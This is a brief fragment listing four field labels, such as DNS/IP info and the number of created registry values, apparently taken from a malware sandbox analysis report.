  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values